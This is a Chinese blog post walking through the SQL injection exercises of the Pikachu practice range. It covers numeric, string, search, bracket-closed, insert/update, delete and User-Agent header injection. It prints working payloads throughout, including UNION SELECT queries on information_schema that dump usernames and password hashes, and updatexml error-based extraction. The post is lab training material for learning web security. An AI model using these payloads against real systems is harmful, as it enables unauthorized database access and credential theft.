pikachu-sql注入练习

最新推荐文章于 2024-05-24 08:00:00 发布
最新推荐文章于 2024-05-24 08:00:00 发布
阅读量323 收藏
点赞数 2
文章标签: mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mogdemo/article/details/105482549
版权

pikachu-sql注入练习

注入思路

判断闭合方式 --> 判断sql注入类型 --> 测试绕过 -->oder by查字段数 --> select 1,2,3确定显示位 --> 查数据库名 -->查表名 --> 列名 --> 内容(用户名密码)

  1. 数字型注入(post)

选择数字查询,url不发生传参变化,说明是post方法提交数据。
在这里插入图片描述
使用burpsuite抓包,在id=1之后加’,报错说明存在sql注入
在这里插入图片描述
数字型的SQL语句为 select * from user where id =$id 因此不需要闭合。直接构造SQL语句,尝试sql注入
在这里插入图片描述
查询当前数据库select *from user where id=1 union select 1,database()#
在这里插入图片描述
查询当前数据库pikachu的表
id=1 union select 1,table_name from information_schema.tables where table_schema=“pikachu”#
在这里插入图片描述
查询user中的字段
id=1 union select 1,column_name from information_schema.columns where table_name=“users”#
在这里插入图片描述
查询user中的数据(用户名,密码)
id=1 union select username,password from users#
在这里插入图片描述
通过md5在线解密,可以获得user表中的用户对应的密码
在这里插入图片描述

注:
(1)涉及varchar的值的时候,必须有单引号来包括varchar值。int等其他字段类型,则不需要加单引号包括。
(2)information_schema数据库表说明:

SCHEMATA表:提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。

TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。是show tables from schemaname的结果取之此表。

COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。

STATISTICS表:提供了关于表索引的信息。是show index from schemaname.tablename的结果取之此表。

USER_PRIVILEGES(用户权限)表:给出了关于全程权限的信息。该信息源自mysql.user授权表。是非标准表。

SCHEMA_PRIVILEGES(方案权限)表:给出了关于方案(数据库)权限的信息。该信息来自mysql.db授权表。是非标准表。

TABLE_PRIVILEGES(表权限)表:给出了关于表权限的信息。该信息源自mysql.tables_priv授权表。是非标准表。

COLUMN_PRIVILEGES(列权限)表:给出了关于列权限的信息。该信息源自mysql.columns_priv授权表。是非标准表。

CHARACTER_SETS(字符集)表:提供了mysql实例可用字符集的信息。是SHOW CHARACTER SET结果集取之此表。

COLLATIONS表:提供了关于各字符集的对照信息。

COLLATION_CHARACTER_SET_APPLICABILITY表:指明了可用于校对的字符集。这些列等效于SHOW COLLATION的前两个显示字段。

TABLE_CONSTRAINTS表:描述了存在约束的表。以及表的约束类型。

KEY_COLUMN_USAGE表:描述了具有约束的键列。

ROUTINES表:提供了关于存储子程序(存储程序和函数)的信息。此时,ROUTINES表不包含自定义函数(UDF)。名为“mysql.proc name”的列指明了对应于INFORMATION_SCHEMA.ROUTINES表的mysql.proc表列。

VIEWS表:给出了关于数据库中的视图的信息。需要有show views权限,否则无法查看视图信息。

TRIGGERS表:提供了关于触发程序的信息。必须有super权限才能查看该表

  1. 字符型注入(get)
    查询语句输入’,提示sql语句报错,且在url中传参发生变化,说明存在sql注入漏洞且传参类型为get类型
    在这里插入图片描述
    在这里插入图片描述
    猜测sql语句为select * from users where id = ‘$id’;需要闭合单引号

构造SQL语句 admin’ or 1=1#
在这里插入图片描述
在这里插入图片描述
利用order by 来查询列数
admin’ order by 1,2,3#
在这里插入图片描述
通过UNION SELECT爆出在网页中的显示位。
注:显示位指的是网页中能够显示数据的位置。举例来说,比如我们通过ORDER BY命令知道了表的列数为11。然后再使用UNION SELECT 1,2,3…,11 from table,网页中显示了信息8,那么说明网页只能够显示第8列中信息,不能显示其他列的信息。也可以理解为网页只开放了8这个窗口,你想要查询数据库信息就必须要通过这个窗口。所以如果我们想要知道某个属性的值,比如admin,就要把admin属性放到8的位置上,这样就能通过第8列爆出admin的信息。
admin’ union select 1,2#
在这里插入图片描述
显示位未1,即可在当前位置查询数据库信息,数据库名为pikachu
admin’ union select 1,database()#
在这里插入图片描述
在这里插入图片描述

  1. 搜索型注入

输入admin’,sql语句报错,存在sql注入漏洞
在这里插入图片描述
构造SQL语句 admin’ or 1=1
若报错则为字符串类型,需要#闭合单引号 admin’ or 1=1#
在这里插入图片描述
order by来查询列数
admin’ order by 4#
在这里插入图片描述
查找显示位 admin’ union select 1,2,3#
在这里插入图片描述
查询当前数据库 1’ union select null,null,database()#(第三位为显示位)
在这里插入图片描述
用户名在第一列,用户id在第二列,email在第三列,选择第一位为显示位
查找当前用户权限 admin’ union select user(),2,3#,为root权限
在这里插入图片描述
查找当前数据库 admin’ union select database(),2,3#
在这里插入图片描述
查找数据库表名 admin’ union select (select group_concat(table_name) from information_schema.tables where table_schema=“pikachu”),2,3#
在这里插入图片描述
查找user表中的用户名 admin’ union select (select group_concat(username) from pikachu.users),2,3#
在这里插入图片描述
查找密码 admin’ union select (select group_concat(password) from pikachu.users),2,3#
在这里插入图片描述
查询用户名密码,可用语句 admin’ union select username,password,3 from users#

小结:
数字型,字符型,搜索型 语法区别:

数字型: SELECT 列 FROM 表 WHERE 数字型列=值

字符型: SELECT 列 FROM 表 WHERE 字符型列=’值’

搜索型: SELECT * FROM 表 WHERE where 被搜索的列 like ‘%值%’

4.XX型注入

常见的闭合方式有成对的’ ‘、” “、( )、以及类似于(“ ”)、(’ ')这种

构造payload ,进行单双引号测试
admin’ or 1=1 admin’ or 1=1# 单双引号均报错, admin" or 1=1# 显示不存在
在这里插入图片描述
在这里插入图片描述
猜测SQL查询语句为 select * from users where id = (’$id’)
需要闭合’),输入admin’) or 1=1#
在这里插入图片描述

查询列数及显示位 admin’) order by 3#
在这里插入图片描述
admin’) union select 1,2#
在这里插入图片描述
查询数据库,admin’) union select 1,database()#
在这里插入图片描述
5.insert/update 注入
输入单引号报错,说明存在sql注入
在这里插入图片描述
在这里插入图片描述
多个参数提交的sql语句 insert into user(username,password,sex,phonenum,email,add1,add2)value(‘xxx’,‘xxx’,‘x’,xxx,‘xx’,‘xx’,‘xx’)
要构造闭合首先在我们可以输入的部分就是‘xxxx’里插入报错函数
updataxml,是mysql对xml文档函数进行出巡和修改的Xpath函数。函数有三个参数,第一个数指定xml文档表的字段名称,第二个是指定要替换的位置,第三个是新的值。updatexml(null,null,null)

concat函数意思是将传进去的参数组合成一个字符串打印出来,concat也可以执行表达式也就是将 0x7e和database()结果组合成一个字符串打印出来,0x7e是~号的十六进制
payload: a’ or updatexml(1,concat(0x7e,database()),0) or ’ 得到pikachu表
在这里插入图片描述

  1. delete 注入
    提交留言一切正常,删除留言,发现是根据id来查找要删除的留言
    在这里插入图片描述
    我们在id处进行payload构造 65 or updatexml(1,concat(0x7e,database()),0)
    在这里插入图片描述
    7.http header 注入
    http-header注入漏洞正是由于后台把超文本传输头中的一些信息拿去拼接到sql语句中又不做安全处理造成的。
    因为认为数据库是对http头中的信息进行了获取并拼接,在这里主要就用user agent这个字段来进行测试
    在这里插入图片描述
    后台数据库采用的是insert语句将获取到的信息拼接到sql查询语句当中的,根据之前博客中提到的相关注入语句知识,构造insert注入.
    ’ or updatexml(1,concat(0x7e,database()),0) or’
    在这里插入图片描述
mogdemo
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pikachu-master.zip
06-25
Pikachu靶场中,你可以学习如何识别SQL注入漏洞,以及使用各种技巧防止此类攻击。 2. XSS(跨站脚本):这种漏洞允许攻击者在用户浏览器上执行恶意脚本,可能导致个人信息被窃取或网站被劫持。靶场会教你如何防御...
sqli-labs 11-16
weixin_45442394的博客
09-14 283
一、环境配置 二、访问192.168.182.167:8001 Less-11 输入admin’,出现语法错误,存在字符型注入 admin’ or ‘1’=’1,登录成功 admin’ order by 2#,页面回显,有两列 -adminunion select 1,2 #,判断显示位 -adminunion select 1,database() #,判断数据库名称 查数据库“security”的表: -adminunion select 1,group_concat(ta
一文了解pikachuSQL注入
allintao的博客
03-01 2680
本文章主要讲解关于pikachu的注入方式。目录一、数字型注入(post)二、字符型注入(get)三、搜索型注入四、xx型注入五、"insert/update"注入六、"delete"注入七、"http header"注入八、盲注(base on boolian)九、盲注(base on time)十、宽字节注入。
SQL注入pikachu靶场中的SQL注入通关
qq_68163788的博客
05-24 1316
SQL注入是一种常见的网络攻击技术,攻击者利用应用程序对用户输入数据的处理不当,通过在输入字段中插入恶意的SQL代码,从而实现对数据库的非法访问和控制。通过成功利用SQL注入漏洞,攻击者可以执行未经授权的操作,如删除、修改或获取敏感数据。在pikachu靶场中,玩家需要利用自己的技能和知识,深入了解SQL注入的原理和方法,通过不断尝试和实践,最终成功通关。这个过程不仅可以帮助玩家提升对SQL注入漏洞的识别和防范能力,还能加深对网络安全的理解和认识。
pikachu之搜索型注入
weixin_43622525的博客
03-07 6843
目录 pikachu 简介 搭建 windows Docker SQL注入 搜索型注入 pikachu 简介 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。 搭建 windows 搭建phpstudy环境,将pikachu解压在网站根目录进行搭建。 Docker docker build -t "pikachu" . docker run
Pikachu-----Sql Inject(SQL注入
m0_65712192的博客
12-29 2583
Pikachu-----Sql Inject(SQL注入
pikachu靶场通关之sql注入系列
qq_51902218的博客
09-16 6578
1.判断是否注入(是否严格校验)(1)可控参数(id)能否影响页面显示(2)输入的SQL语句是否能报错(能通过数据库报错,看到数据库一些语句痕迹)(selectusername,passwordfromuserwhereid=?’)后面单引号或者双引号通过在URL中修改对应的id值,值为正常数字、大数字、字符(单引号、双引号、双单引号、括号)、反斜杠\来探测URL中是否存在注入点(3)输入的SQL语句能否不报错(我们的语句能够成功闭合)(selectusername,passwordf。......
pikachu-master靶场
07-14
例如,在"pikachu-master"中,可能包括了不同难度级别的Web渗透测试练习,如SQL注入、XSS跨站脚本、命令注入等。这些练习通常会设置特定的漏洞,学习者需要通过分析HTTP请求、查看源代码、利用漏洞工具等方式来找出...
WEB渗透学习-pikachu靶场练习
04-20
pikachu是一个开源靶场,适用于新手学习WEB安全练习使用,内涵XSS漏洞、sql注入漏洞、SEC漏洞、文件上传(下载)漏洞、文件包含漏洞以及越权漏洞等
第16天:WEB漏洞-SQL注入之查询方式及报错盲注1
08-03
SQL注入】是一种常见的网络安全漏洞,发生在Web应用程序中,攻击者通过输入恶意的SQL语句来控制或篡改数据库。本话题主要关注的是在没有直接回显的情况下如何进行SQL注入,特别是通过查询方式和报错盲注技术。 **...
pikachuSQL注入
qq_58091216的博客
11-04 2285
SQL注入(SQLi)是一种注入攻击,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。
pikachu-SQL注入
qq_43660551的博客
05-11 1353
发现kobe’ and if((substr(database(),1,1))=‘p’,sleep(5),null)#时,延迟了,就这样慢慢尝试,或者拿bp弄字典跑跑啥的。用load_file()之前务必先看secure_file_priv=“”。看看数据库名的长度:name=kobe’ and length(database())>=7#,这里需要url编码,即:name=kobe’+and+length(database())>%3d7%23&submit=%E6%9F%A5%E8%AF%A2。
pikachu-sql注入
Resets_的博客
04-01 556
pikachu sql数字型注入,字符型注入
pikachu之特殊注入之搜索型注入、xx型注入、insert/update注入、delete注入、宽字节注入
2301_80661529的博客
03-02 1245
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节。
Pikachu(皮卡丘)靶场中SQL注入
剁椒鱼头没剁椒的博客
12-14 4970
1)宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个 字符是一个汉字(前一个 ascii 码要大于 128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql 会调用转义函数,将单引号变为’,其中\的十 六进制是%5c,mysql 的 GBK 编码,会认为%df%5c 是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。输入kobe’ and 1=1#的时候页面正常,并且kobe’ and 1=2#页面不正常,证明使用单引号闭合。
Pikachu SQL注入之搜索型注入
SS_liang的博客
01-11 532
无论是搜索型还是字符型,都是需要找到闭合的方式也就是闭合的字符,然后进行sql注入:这里我直接梭哈,原理都一样就没必要再详细说一遍了,前面的文章都有: 最后结果就是:这题闭合符号是%'拿下!
Pikachu搜索型注入
xdjxi的博客
03-07 845
一、原理 “%”匹配任何字符,“like”的意思就是像,这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password,正常用户当然会输入例如admin,ckse等等。 构造对应的闭合,闭合前面的单引号和百分号,注释后面的百分号和单引号。构造的payload如下 xxxx%’ or 1=1# 二、操作 打开进入界面: 然后我们可以输入’ and 1=1 order by x#通过order by x来确定字段数,时返回了正常页面然后我们可以输入’ and 1...
Pickachu第四弹:SQL注入
Pisces_mango的博客
09-03 1107
目录 一、数字型注入(post) 二、字符型输入(get) 三、搜索型注入 四、xx型注入 五、“insert/update”注入 六、“delete”型注入 七、“http header”注入 八、盲注(base on boolian) 九、盲注(base on time) 十、宽字节注入 十一、手工测试流程 十二、报错利用流程 一、数字型注入(post) 看到输入点后,我们想象一下它在数据库中是怎样操作的,select 字段1,字段2 from 表名 where id=1
pikachu靶场通关之sql注入
qq_74825121的博客
01-21 2585
pikachu靶场通关之sql注入
pikachu通关sql注入
最新发布
06-21
"Pikachu"并不是一个直接相关的术语,但如果我们假设你想了解如何使用SQL注入技术,通常这涉及到以下几个步骤: 1. **理解目标**:首先,你需要知道你要攻击的应用程序连接到哪个数据库以及它的查询结构。 2. **...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值